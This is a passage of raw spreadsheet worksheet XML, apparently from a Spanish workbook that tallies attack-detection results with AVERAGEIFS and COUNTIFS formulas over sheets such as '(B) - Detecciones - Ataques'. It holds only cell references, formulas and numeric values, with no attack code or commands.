        <f>'(D) - Análisis Resultados II - '!GI22</f>
        <v/>
      </c>
      <c r="CY81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GJ22</f>
        <v/>
      </c>
      <c r="CZ81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GK22</f>
        <v/>
      </c>
      <c r="DA81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GL22</f>
        <v/>
      </c>
      <c r="DB81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GM22</f>
        <v/>
      </c>
      <c r="DC81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GN22</f>
        <v/>
      </c>
      <c r="DD81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GO22</f>
        <v/>
      </c>
      <c r="DE81" s="368" t="str">
        <f>'(D) - Análisis Resultados II - '!GP22</f>
        <v/>
      </c>
      <c r="DF81" s="368"/>
      <c r="DG81" s="368"/>
      <c r="DH81" s="368"/>
      <c r="DI81" s="368"/>
      <c r="DJ81" s="368"/>
      <c r="DK81" s="368"/>
      <c r="DL81" s="368"/>
      <c r="DM81" s="368"/>
      <c r="DN81" s="368"/>
      <c r="DO81" s="368"/>
    </row>
    <row r="82">
      <c r="B82" s="806"/>
      <c r="C82" s="807"/>
      <c r="D82" s="808"/>
      <c r="E82" s="808"/>
      <c r="F82" s="808"/>
      <c r="G82" s="808"/>
      <c r="H82" s="809"/>
      <c r="I82" s="806"/>
      <c r="K82" s="548" t="s">
        <v>2177</v>
      </c>
      <c r="L82" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="M82" s="374">
        <f>'(D) - Análisis Resultados II - '!Y22</f>
        <v>1</v>
      </c>
      <c r="N82" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K82)</f>
        <v>1</v>
      </c>
      <c r="O82" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P82" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q82" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T82" s="864" t="s">
        <v>2177</v>
      </c>
      <c r="U82" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="V82" s="69">
        <v>1.0</v>
      </c>
      <c r="W82" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T82)</f>
        <v>1</v>
      </c>
      <c r="X82" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y82" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z82" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB82" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC82" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD82" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="83">
      <c r="B83" s="806"/>
      <c r="C83" s="807"/>
      <c r="D83" s="808"/>
      <c r="E83" s="808"/>
      <c r="F83" s="808"/>
      <c r="G83" s="808"/>
      <c r="H83" s="809"/>
      <c r="I83" s="806"/>
      <c r="K83" s="352" t="s">
        <v>2193</v>
      </c>
      <c r="L83" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AK$131)
</f>
        <v>1</v>
      </c>
      <c r="M83" s="374">
        <f>'(D) - Análisis Resultados II - '!Z22</f>
        <v>0</v>
      </c>
      <c r="N83" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K83)</f>
        <v>1</v>
      </c>
      <c r="O83" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P83" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q83" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T83" s="865" t="s">
        <v>2193</v>
      </c>
      <c r="U83" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AK$131)
</f>
        <v>1</v>
      </c>
      <c r="V83" s="69">
        <v>0.0</v>
      </c>
      <c r="W83" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T83)</f>
        <v>1</v>
      </c>
      <c r="X83" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y83" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z83" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB83" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC83" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD83" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="84">
      <c r="B84" s="806"/>
      <c r="C84" s="807"/>
      <c r="D84" s="808"/>
      <c r="E84" s="808"/>
      <c r="F84" s="808"/>
      <c r="G84" s="808"/>
      <c r="H84" s="809"/>
      <c r="I84" s="806"/>
      <c r="K84" s="352" t="s">
        <v>2095</v>
      </c>
      <c r="L84" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AL$131)
</f>
        <v>0</v>
      </c>
      <c r="M84" s="374">
        <f>'(D) - Análisis Resultados II - '!AA22</f>
        <v>0</v>
      </c>
      <c r="N84" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K84)</f>
        <v>1</v>
      </c>
      <c r="O84" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P84" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q84" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T84" s="865" t="s">
        <v>2095</v>
      </c>
      <c r="U84" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AL$131)
</f>
        <v>0</v>
      </c>
      <c r="V84" s="69">
        <v>1.0</v>
      </c>
      <c r="W84" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T84)</f>
        <v>1</v>
      </c>
      <c r="X84" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y84" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z84" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB84" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC84" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD84" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="85">
      <c r="B85" s="806"/>
      <c r="C85" s="807"/>
      <c r="D85" s="808"/>
      <c r="E85" s="808"/>
      <c r="F85" s="808"/>
      <c r="G85" s="808"/>
      <c r="H85" s="809"/>
      <c r="I85" s="806"/>
      <c r="K85" s="352" t="s">
        <v>2074</v>
      </c>
      <c r="L85" s="552" t="s">
        <v>12</v>
      </c>
      <c r="M85" s="374">
        <f>'(D) - Análisis Resultados II - '!AB22</f>
        <v>0.05366134369</v>
      </c>
      <c r="N85" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K85)</f>
        <v>0</v>
      </c>
      <c r="O85" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P85" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q85" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T85" s="865" t="s">
        <v>2074</v>
      </c>
      <c r="U85" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V85" s="69">
        <v>0.9997122716155948</v>
      </c>
      <c r="W85" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T85)</f>
        <v>0</v>
      </c>
      <c r="X85" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y85" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z85" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB85" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC85" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD85" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
      <c r="AE85" s="368"/>
      <c r="AF85" s="368"/>
      <c r="AG85" s="368"/>
      <c r="AH85" s="368"/>
      <c r="AI85" s="368"/>
      <c r="AJ85" s="368"/>
      <c r="AK85" s="368"/>
      <c r="AL85" s="368"/>
      <c r="AM85" s="368"/>
      <c r="AN85" s="368"/>
      <c r="AO85" s="368"/>
      <c r="AP85" s="368"/>
      <c r="AQ85" s="368"/>
      <c r="AR85" s="368"/>
      <c r="AS85" s="368"/>
      <c r="AT85" s="368"/>
      <c r="AU85" s="368"/>
      <c r="AV85" s="368"/>
      <c r="AW85" s="368">
        <f>'(D) - Análisis Resultados III -'!AP22</f>
        <v>0</v>
      </c>
      <c r="AX85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!AQ22</f>
        <v>-</v>
      </c>
      <c r="AY85" s="368">
        <f>'(D) - Análisis Resultados III -'!AR22</f>
        <v>0.6666666667</v>
      </c>
      <c r="AZ85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!AS22</f>
        <v>-</v>
      </c>
      <c r="BA85" s="368">
        <f>'(D) - Análisis Resultados III -'!AT22</f>
        <v>0</v>
      </c>
      <c r="BB85" s="368">
        <f>'(D) - Análisis Resultados III -'!AU22</f>
        <v>1</v>
      </c>
      <c r="BC85" s="368">
        <f>'(D) - Análisis Resultados III -'!AV22</f>
        <v>1</v>
      </c>
      <c r="BD85" s="368">
        <f>'(D) - Análisis Resultados III -'!AW22</f>
        <v>1</v>
      </c>
      <c r="BE85" s="368">
        <f>'(D) - Análisis Resultados III -'!AX22</f>
        <v>0</v>
      </c>
      <c r="BF85" s="368">
        <f>'(D) - Análisis Resultados III -'!AY22</f>
        <v>1</v>
      </c>
      <c r="BG85" s="368">
        <f>'(D) - Análisis Resultados III -'!AZ22</f>
        <v>0</v>
      </c>
      <c r="BH85" s="368">
        <f>'(D) - Análisis Resultados III -'!BA22</f>
        <v>0</v>
      </c>
      <c r="BI85" s="368">
        <f>'(D) - Análisis Resultados III -'!BB22</f>
        <v>0.4</v>
      </c>
      <c r="BJ85" s="368">
        <f>'(D) - Análisis Resultados III -'!BC22</f>
        <v>0.4997100329</v>
      </c>
      <c r="BK85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!BD22</f>
        <v>-</v>
      </c>
      <c r="BL85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!BE22</f>
        <v>-</v>
      </c>
      <c r="BM85" s="368">
        <f>'(D) - Análisis Resultados III -'!BF22</f>
        <v>1</v>
      </c>
      <c r="BN85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!BG22</f>
        <v>-</v>
      </c>
      <c r="BO85" s="368">
        <f>'(D) - Análisis Resultados III -'!BH22</f>
        <v>0</v>
      </c>
      <c r="BP85" s="368">
        <f>'(D) - Análisis Resultados III -'!BI22</f>
        <v>0</v>
      </c>
      <c r="BQ85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!BJ22</f>
        <v>-</v>
      </c>
      <c r="BR85" s="368">
        <f>'(D) - Análisis Resultados III -'!BK22</f>
        <v>0</v>
      </c>
      <c r="BS85" s="368">
        <f>'(D) - Análisis Resultados III -'!BL22</f>
        <v>1</v>
      </c>
      <c r="BT85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!BM22</f>
        <v>-</v>
      </c>
      <c r="BU85" s="368">
        <f>'(D) - Análisis Resultados III -'!BN22</f>
        <v>1</v>
      </c>
      <c r="BV85" s="368">
        <f>'(D) - Análisis Resultados III -'!BO22</f>
        <v>0</v>
      </c>
      <c r="BW85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!BP22</f>
        <v>-</v>
      </c>
      <c r="BX85" s="368">
        <f>'(D) - Análisis Resultados III -'!BQ22</f>
        <v>1</v>
      </c>
      <c r="BY85" s="368">
        <f>'(D) - Análisis Resultados III -'!BR22</f>
        <v>0</v>
      </c>
      <c r="BZ85" s="368">
        <f>'(D) - Análisis Resultados III -'!BS22</f>
        <v>1</v>
      </c>
      <c r="CA85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!BT22</f>
        <v>-</v>
      </c>
      <c r="CB85" s="368">
        <f>'(D) - Análisis Resultados III -'!BU22</f>
        <v>0</v>
      </c>
      <c r="CC85" s="368">
        <f>'(D) - Análisis Resultados III -'!BV22</f>
        <v>0</v>
      </c>
      <c r="CD85" s="368">
        <f>'(D) - Análisis Resultados III -'!BW22</f>
        <v>0</v>
      </c>
      <c r="CE85" s="368">
        <f>'(D) - Análisis Resultados III -'!BX22</f>
        <v>1</v>
      </c>
      <c r="CF85" s="368">
        <f>'(D) - Análisis Resultados III -'!BY22</f>
        <v>0</v>
      </c>
      <c r="CG85" s="368">
        <f>'(D) - Análisis Resultados III -'!BZ22</f>
        <v>1</v>
      </c>
      <c r="CH85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CA22</f>
        <v>-</v>
      </c>
      <c r="CI85" s="368">
        <f>'(D) - Análisis Resultados III -'!CB22</f>
        <v>1</v>
      </c>
      <c r="CJ85" s="368">
        <f>'(D) - Análisis Resultados III -'!CC22</f>
        <v>1</v>
      </c>
      <c r="CK85" s="368">
        <f>'(D) - Análisis Resultados III -'!CD22</f>
        <v>1</v>
      </c>
      <c r="CL85" s="368">
        <f>'(D) - Análisis Resultados III -'!CE22</f>
        <v>0</v>
      </c>
      <c r="CM85" s="368">
        <f>'(D) - Análisis Resultados III -'!CF22</f>
        <v>1</v>
      </c>
      <c r="CN85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CG22</f>
        <v>-</v>
      </c>
      <c r="CO85" s="368">
        <f>'(D) - Análisis Resultados III -'!CH22</f>
        <v>0.9920891937</v>
      </c>
      <c r="CP85" s="368">
        <f>'(D) - Análisis Resultados III -'!CI22</f>
        <v>0</v>
      </c>
      <c r="CQ85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CJ22</f>
        <v>-</v>
      </c>
      <c r="CR85" s="368">
        <f>'(D) - Análisis Resultados III -'!CK22</f>
        <v>0</v>
      </c>
      <c r="CS85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CL22</f>
        <v>-</v>
      </c>
      <c r="CT85" s="368">
        <f>'(D) - Análisis Resultados III -'!CM22</f>
        <v>0</v>
      </c>
      <c r="CU85" s="368">
        <f>'(D) - Análisis Resultados III -'!CN22</f>
        <v>1</v>
      </c>
      <c r="CV85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CO22</f>
        <v>-</v>
      </c>
      <c r="CW85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CP22</f>
        <v>-</v>
      </c>
      <c r="CX85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CQ22</f>
        <v>-</v>
      </c>
      <c r="CY85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CR22</f>
        <v>-</v>
      </c>
      <c r="CZ85" s="368">
        <f>'(D) - Análisis Resultados III -'!CS22</f>
        <v>0</v>
      </c>
      <c r="DA85" s="368">
        <f>'(D) - Análisis Resultados III -'!CT22</f>
        <v>0</v>
      </c>
      <c r="DB85" s="368">
        <f>'(D) - Análisis Resultados III -'!CU22</f>
        <v>0</v>
      </c>
      <c r="DC85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CV22</f>
        <v>-</v>
      </c>
      <c r="DD85" s="368">
        <f>'(D) - Análisis Resultados III -'!CW22</f>
        <v>1</v>
      </c>
      <c r="DE85" s="368">
        <f>'(D) - Análisis Resultados III -'!CX22</f>
        <v>1</v>
      </c>
      <c r="DF85" s="368">
        <f>'(D) - Análisis Resultados III -'!CY22</f>
        <v>0.09090909091</v>
      </c>
      <c r="DG85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!CZ22</f>
        <v/>
      </c>
      <c r="DH85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!DA22</f>
        <v/>
      </c>
      <c r="DI85" s="368" t="str">
        <f>'(D) - Análisis Resultados III -'!DB22</f>
        <v/>
      </c>
    </row>
    <row r="86">
      <c r="B86" s="806"/>
      <c r="C86" s="807"/>
      <c r="D86" s="808"/>
      <c r="E86" s="808"/>
      <c r="F86" s="808"/>
      <c r="G86" s="808"/>
      <c r="H86" s="809"/>
      <c r="I86" s="806"/>
      <c r="K86" s="352" t="s">
        <v>2061</v>
      </c>
      <c r="L86" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AL$131)
</f>
        <v>0</v>
      </c>
      <c r="M86" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!AC22</f>
        <v>-</v>
      </c>
      <c r="N86" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K86)</f>
        <v>0</v>
      </c>
      <c r="O86" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P86" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q86" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T86" s="865" t="s">
        <v>2061</v>
      </c>
      <c r="U86" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V86" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W86" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T86)</f>
        <v>0</v>
      </c>
      <c r="X86" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y86" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z86" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB86" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC86" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD86" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="87">
      <c r="B87" s="806"/>
      <c r="C87" s="807"/>
      <c r="D87" s="808"/>
      <c r="E87" s="808"/>
      <c r="F87" s="808"/>
      <c r="G87" s="808"/>
      <c r="H87" s="809"/>
      <c r="I87" s="806"/>
      <c r="K87" s="352" t="s">
        <v>2015</v>
      </c>
      <c r="L87" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AL$131)
</f>
        <v>0</v>
      </c>
      <c r="M87" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!AD22</f>
        <v>-</v>
      </c>
      <c r="N87" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K87)</f>
        <v>0</v>
      </c>
      <c r="O87" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P87" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q87" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T87" s="865" t="s">
        <v>2015</v>
      </c>
      <c r="U87" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W87" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T87)</f>
        <v>0</v>
      </c>
      <c r="X87" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y87" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z87" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB87" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC87" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD87" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
      <c r="AE87" s="69"/>
      <c r="AF87" s="69"/>
      <c r="AG87" s="69"/>
      <c r="AH87" s="69"/>
      <c r="AI87" s="69"/>
      <c r="AJ87" s="69"/>
      <c r="AK87" s="69"/>
      <c r="AL87" s="69"/>
      <c r="AM87" s="69"/>
      <c r="AN87" s="69"/>
      <c r="AO87" s="69"/>
      <c r="AP87" s="69"/>
      <c r="AQ87" s="69"/>
      <c r="AR87" s="69"/>
      <c r="AS87" s="69"/>
      <c r="AT87" s="69"/>
      <c r="AU87" s="69"/>
      <c r="AV87" s="69"/>
      <c r="AW87" s="69">
        <v>0.0</v>
      </c>
      <c r="AX87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="AY87" s="69">
        <v>0.6666666666666666</v>
      </c>
      <c r="AZ87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="BA87" s="69">
        <v>0.0</v>
      </c>
      <c r="BB87" s="69">
        <v>1.0</v>
      </c>
      <c r="BC87" s="69">
        <v>1.0</v>
      </c>
      <c r="BD87" s="69">
        <v>1.0</v>
      </c>
      <c r="BE87" s="69">
        <v>0.0</v>
      </c>
      <c r="BF87" s="69">
        <v>1.0</v>
      </c>
      <c r="BG87" s="69">
        <v>0.0</v>
      </c>
      <c r="BH87" s="69">
        <v>0.0</v>
      </c>
      <c r="BI87" s="69">
        <v>0.4</v>
      </c>
      <c r="BJ87" s="69">
        <v>0.4997100328629422</v>
      </c>
      <c r="BK87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="BL87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="BM87" s="69">
        <v>1.0</v>
      </c>
      <c r="BN87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="BO87" s="69">
        <v>0.0</v>
      </c>
      <c r="BP87" s="69">
        <v>0.0</v>
      </c>
      <c r="BQ87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="BR87" s="69">
        <v>0.0</v>
      </c>
      <c r="BS87" s="69">
        <v>1.0</v>
      </c>
      <c r="BT87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="BU87" s="69">
        <v>1.0</v>
      </c>
      <c r="BV87" s="69">
        <v>0.0</v>
      </c>
      <c r="BW87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="BX87" s="69">
        <v>1.0</v>
      </c>
      <c r="BY87" s="69">
        <v>0.0</v>
      </c>
      <c r="BZ87" s="69">
        <v>1.0</v>
      </c>
      <c r="CA87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="CB87" s="69">
        <v>0.0</v>
      </c>
      <c r="CC87" s="69">
        <v>0.0</v>
      </c>
      <c r="CD87" s="69">
        <v>0.0</v>
      </c>
      <c r="CE87" s="69">
        <v>1.0</v>
      </c>
      <c r="CF87" s="69">
        <v>0.0</v>
      </c>
      <c r="CG87" s="69">
        <v>1.0</v>
      </c>
      <c r="CH87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="CI87" s="69">
        <v>1.0</v>
      </c>
      <c r="CJ87" s="69">
        <v>1.0</v>
      </c>
      <c r="CK87" s="69">
        <v>1.0</v>
      </c>
      <c r="CL87" s="69">
        <v>0.0</v>
      </c>
      <c r="CM87" s="69">
        <v>1.0</v>
      </c>
      <c r="CN87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="CO87" s="69">
        <v>0.9920891936509395</v>
      </c>
      <c r="CP87" s="69">
        <v>0.0</v>
      </c>
      <c r="CQ87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="CR87" s="69">
        <v>0.0</v>
      </c>
      <c r="CS87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="CT87" s="69">
        <v>0.0</v>
      </c>
      <c r="CU87" s="69">
        <v>1.0</v>
      </c>
      <c r="CV87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="CW87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="CX87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="CY87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="CZ87" s="69">
        <v>0.0</v>
      </c>
      <c r="DA87" s="69">
        <v>0.0</v>
      </c>
      <c r="DB87" s="69">
        <v>0.0</v>
      </c>
      <c r="DC87" s="69" t="s">
        <v>12</v>
      </c>
      <c r="DD87" s="69">
        <v>1.0</v>
      </c>
      <c r="DE87" s="69">
        <v>1.0</v>
      </c>
      <c r="DF87" s="69">
        <v>0.09090909090909091</v>
      </c>
    </row>
    <row r="88">
      <c r="B88" s="806"/>
      <c r="C88" s="807"/>
      <c r="D88" s="808"/>
      <c r="E88" s="808"/>
      <c r="F88" s="808"/>
      <c r="G88" s="808"/>
      <c r="H88" s="809"/>
      <c r="I88" s="806"/>
      <c r="K88" s="352" t="s">
        <v>953</v>
      </c>
      <c r="L88" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AL$131)
</f>
        <v>0</v>
      </c>
      <c r="M88" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!AE22</f>
        <v>-</v>
      </c>
      <c r="N88" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K88)</f>
        <v>0</v>
      </c>
      <c r="O88" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P88" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q88" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T88" s="865" t="s">
        <v>953</v>
      </c>
      <c r="U88" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V88" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W88" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T88)</f>
        <v>0</v>
      </c>
      <c r="X88" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
